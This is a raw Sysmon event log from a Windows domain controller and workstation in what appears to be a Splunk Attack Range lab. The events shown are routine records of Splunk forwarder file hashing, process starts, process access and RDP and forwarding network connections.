23542300x80000000000000001048011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:41.904{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA523865D7AD91C674FACE93CC233810,SHA256=AE5957511F2CA418E3DC61E97CBFA9D5B3C9869EB5FC816985033C179B3122E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:41.036{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED0203BCBB3DE045A6F329F987020476,SHA256=FF2CA2DA47D32730555543917507F35587613BA4883FE4AB2F489618F52017BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976625Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:42.202{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05356BB90DCB8207C55D157AFDC0D143,SHA256=2751216C7B90DB046FABADA57B9538119F1F05C298CB78B1855F08F968DCFF92,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:40.287{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49414-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:42.051{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29F3F927D18AFDF1C1D897BC48B0008B,SHA256=FB798AFA0E0BE175F7A59344BC6F562C9D9A8461C4BDE373023F5427B7B22671,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976628Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:40.313{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50457-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976627Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:43.214{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E83FEB2532A2C77B220EE9F6BD6B2D0,SHA256=E0B52929C79D2DC75A7B19EC41E7FED28D9C8B4B19A878F254902266CB0D241A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:41.811{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49226-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:43.069{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E92775AD655510929F748DFBCE1FD4,SHA256=4E955D43D9F406B87B071F6CB795FA39FC9303F4BA36CA05878D9B1838FBE96A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976626Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:43.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82F86738B1391E49E83A2963B819D69A,SHA256=174F946ED645495B7E3CE99AAFA117318F771C4C9F71F957220C32E9401936F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976629Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:44.220{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A67D230AF7C96628F6BCFF6EB3D971,SHA256=C371AD120A1970A3A2AAC0BAA9338B09BED9B20E5299A9D64CF9D2D0A8E30950,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8878-6151-EC79-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8878-6151-EC79-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.570{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8878-6151-EC79-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.549{5EBD8912-8878-6151-EC79-00000000FC01}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:44.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4A64169681D9A8FD0DCD477B9AA39F1,SHA256=A4D55BE71DDC8E3F12B1A6C0A714E3023C8E2C08C030B6C5C7BC7044E24F51E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048044Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8879-6151-EE79-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048043Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048042Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048041Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048040Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048039Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8879-6151-EE79-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048038Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.802{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8879-6151-EE79-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.788{5EBD8912-8879-6151-EE79-00000000FC01}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.602{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5410CB9E95C94077BA1AEE37D65FDDE8,SHA256=A7D235BD4F1C84FBEDC2F6A1DDD732662DD09377DD32FCA0E3241BB4063B6A87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.433{5EBD8912-8879-6151-ED79-00000000FC01}42044756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8879-6151-ED79-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:45.171{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 